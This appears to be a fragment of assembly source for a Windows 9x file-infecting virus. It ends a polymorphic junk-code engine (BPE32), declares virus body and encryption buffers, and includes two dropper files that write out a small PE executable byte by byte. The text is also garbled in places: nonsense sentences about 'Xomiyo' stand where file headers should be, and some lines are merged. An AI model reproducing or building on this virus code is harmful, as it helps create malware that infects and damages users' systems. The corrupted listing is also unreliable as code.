DB 0C1H, 0F8H; SAR EAX, ... DB 0C1H, 0D8H; RCR EAX, ...
DB 083H, 0C0H
DB 083H, 0C8H
DB 083H, 0D0H
DB 083H, 0D8H
DB 083H, 0E0H
DB 083H, 0E8H
DB 083H, 0F0H
DB 083H, 0F8H; CMP EAX, ...
DB 0F8H, 072H; CLC; JC ...
DB 0F9H, 073H; STC; JNC ...
Junx3: Pop ESI; Three Byte Junk Instruction
Push 17
Call Random
Imul Eax, 2
Add ESI, ESI
Movsb
Movsb
R_ran: Push 0
Call Random
Test Al, Al
Je r_ran
Stosb
RET
J2: Call Junx2
DB 8BH; MOV Eax, ...
DB 03H; Add Eax, ...
DB 13H; ADC EAX, ...
DB 2bh; SUB EAX, ...
DB 1BH; SBB EAX, ...
DB 0bh; or eax, ...
DB 33H; XOR Eax, ...
DB 23h; And Eax, ...
DB 33H; Test Eax, ...
Junx2: Pop ESI; Two Byte Junk Instruction
Push 9
Call Random
Add ESI, ESI
Movsb
Push 8
Call Random
SUB AL, -11000000B
Stosb
R_end: RET
J5: Call Junx5
DB 0B8H; MOV Eax, ...
DB 05H; Add Eax, ...
DB 15h; ADC EAX, ...
DB 2DH; SUB EAX, ...
DB 1DH; SBB EAX, ...
DB 0DH; or Eax, ...
DB 35H; XOR Eax, ...
DB 25h; And Eax, ...
DB 0A9H; Test Eax, ...
DB 3DH; CMP EAX, ...
JUNX5: POP ESI; Five Byte Junk Instruction
Push 10
Call Random
Add ESI, ESI
Movsb
PUSH 0
Call Random
Stosd
RET
JCJ: Call Rjunkjc; Junk
Push Edx; Call Label1
Push EBX; JUNK
Push ECX; JMP Label2
MOV Al, 0e8h; Junk
Stosb; Label1: Junk
Push EDI; RET
STOSD; JUNK
Push EDI; Label2:
Call Rjunkjc; Junk
Mov al, 0e9h
Stosb
MOV ECX, EDI
Stosd
MOV EBX, EDI
Call Rjunkjc
POP EAX
Sub Eax, EDI
NEG EAX
Mov Edx, EDI
POP EDI
Stosd
MOV EDI, EDX
Call Rjunkjc
MOV Al, 0C3H
Stosb
Call Rjunkjc
SUB EBX, EDI
NEG EBX
XCHG EAX, EBX
Push EDI
Mov Edi, ECX
Stosd
POP EDI
Call Rjunkjc
POP ECX
POP EBX
POP EDX
RET
Rjunk ENDP
BPE32 ENDP; BPE32 Ends Here
VxdCall_Hook Endp
D1Start: include Drop1.inc
D1Size = DWORD PTR $ - D1STARTD2START: INCLUDE DROP2.INC
D2Size = DWORD PTR $ - D2START
Virus_end:
VxdCall0 DD?
Vxdcall_addr db 6 dup (?)
TargetName DB MAX_PATH DUP (?)
TMPNAME DB 8 DUP (?)
Header DB 4 Image_SizeOf_File_Header /
Image_sizeof_nt_optional_header dup (?)
SECTION_HEADER DB image_sizeof_section_header dup (?)
DB 512 DUP (?)
ThreadStack:
Virus_IN_ARC DB 3000H DUP (?)
Crypted_virus db 2000h dup (?)
Size_unint = $ - virus_end
Workspace1 DB 16 DUP (?)
Workspace2 DB 16 DUP (?)
ENDS
End first_gen
Which is Xomiyo knowing is Xomiyo knows? Where is Xomomo? What am Xiaomo Bg.asm]? Where is Xomiyo knowing is Xomiyo knows? Where is 1 [Drop1.inc]?; First Part of Win9x Dropper
DB 4DH; M
DB 5ah; z
DB 50H; P
DB 0;
DB 2;
DB 0;
DB 0;
DB 0;
DB 4;
DB 0;
DB 0FH;
DB 0;
DB 0FFH;
DB 0FFH;
DB 0;
DB 0;
DB 0B8H;? DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 40h; @
DB 0;
DB 1AH;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 00AH
DB 029h
DB 000H
DB 030H
DB 0
DB 0
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 1;
DB 0;
DB 0;
DB 0BAH;? DB 10h;
DB 0;
DB 0EH;
DB 1FH;
DB 0B4H;? DB 9;
DB 0CDH;? DB 21h;
DB 0B8H;? DB 1;
DB 4ch; L
DB 0CDH;? DB 21h;
DB 90H;? DB 90H;? DB 54H; T
DB 68H; H
DB 69h; i
DB 73h; s
DB 20H;
DB 70H; P
DB 72H; R
DB 6FH; O
DB 67h; g
DB 72H; R
DB 61H; A
DB 6DH; M
DB 20H;
DB 6DH; M
DB 75H; U
DB 73h; s
DB 74H; T
DB 20H;
DB 62H; B
DB 65H; E
DB 20H;
DB 72H; R
DB 75H; U
DB 6EH; N
DB 20H;
DB 75H; U
DB 6EH; N
DB 64H; D
DB 65H; E
DB 72H; R
DB 20H;
DB 57H; WDB 69h; I
DB 6EH; N
DB 33H; 3
DB 32H; 2
DB 0DH;
DB 0AH;
DB 24h; $
DB 37h; 7
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 50H; P
DB 45H; E
DB 0;
DB 0;
DB 4ch; L
DB 1;
DB 4;
DB 0;
DB 0C6H;? DB 24h; $
DB 7CH; | |
DB 5FH;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0E0H;? DB 0;
DB 8EH;? DB 81H;? DB 0BH;
DB 1;
DB 2;
DB 19H;
DB 0;
DB 22h; "
DB 0;
DB 0;
DB 0;
DB 4;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 10h;
DB 0;
DB 0;
DB 0;
DB 10h;
DB 0;
DB 0;
DB 0;
DB 40h; @
DB 0;
DB 0;
DB 0;
DB 0;
DB 40h; @
DB 0;
DB 0;
DB 10h;
DB 0;
DB 0;
DB 0;
DB 2;
DB 0;
DB 0;
DB 1;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 3;
DB 0;
DB 0AH;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 70H; P
DB 0;
DB 0;
DB 0;
DB 4;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 2;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 10h;
DB 0;
DB 0;
DB 20H;
DB 0;
DB 0;
DB 0;
DB 0;
DB 10h;
DB 0;
DB 0;
DB 10h;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 10h;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 50H; P
DB 0;
DB 0;
DB 54H; T
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 60h; `
DB 0;
DB 0;
DB 0CH;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 43H; C
DB 4FH; O O
DB 44H; D
DB 45H; E
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 30h; 0
DB 0;
DB 0;
DB 0;
DB 10h;
DB 0;
DB 0;
DB 0;
DB 22h; "
DB 0;
DB 0;
DB 0;
DB 6;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 20H;
DB 0;
DB 0;
DB 0E0H;? DB 44H; D
DB 41H; A
DB 54H; T
DB 41H; A
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 10h;
DB 0;
DB 0;
DB 0;
DB 40h; @
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 28H;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 40h; @
DB 0;
DB 0;
DB 0C0H; DB 2EH;
DB 69h; i
DB 64H; D
DB 61H; A
DB 74H; T
DB 61H; A
DB 0;
DB 0;
DB 0;
DB 10h;
DB 0;
DB 0;
DB 0;
DB 50H; P
DB 0;
DB 0;
DB 0;
DB 2;
DB 0;
DB 0;
DB 0;
DB 28H;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 40h; @
DB 0;
DB 0;
DB 0C0H; DB 2EH;
DB 72H; R
DB 65H; E
DB 6ch; L
DB 6FH; O
DB 63H; C
DB 0;
DB 0;
DB 0;
DB 10h;
DB 0;
DB 0;
DB 0;
DB 60h; `
DB 0;
DB 0;
DB 0;
DB 2;
DB 0;
DB 0;
DB 0;
DB 2ah; *
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 40h; @
DB 0;
DB 0;
DB 50H; P
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
Which is Xombity isxtil and is Xomiyomo knows? Where is Xiaomokin? Where is it? Where is Drop1.inc]? Where is Xomiyo knowing is Xomiyo knows? Where is the [Drop2.inc]?; Second Part of Win9X Dropper
DB 0FFH;
DB 25H;%
DB 30h; 0
DB 50H; P
DB 40h; @
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 28H;
DB 50H; P
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 38H; 8
DB 50H; P
DB 0;
DB 0;
DB 30h; 0
DB 50H; P
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 46H; F
DB 50H; P
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 46H; F
DB 50H; P
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 4bh; K
DB 45H; E
DB 52H; R
DB 4EH; N
DB 45H; E
DB 4ch; L
DB 33H; 3
DB 32H; 2
DB 2EH;
DB 64H; D
DB 6ch; L
DB 6ch; L
DB 0;
DB 0;
DB 0;
DB 0;
DB 45H; E
DB 78H; X
DB 69h; i
DB 74H; T
DB 50H; P
DB 72H; R
DB 6FH; O
DB 63H; C
DB 65H; E
DB 73h; s
DB 73h; s
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
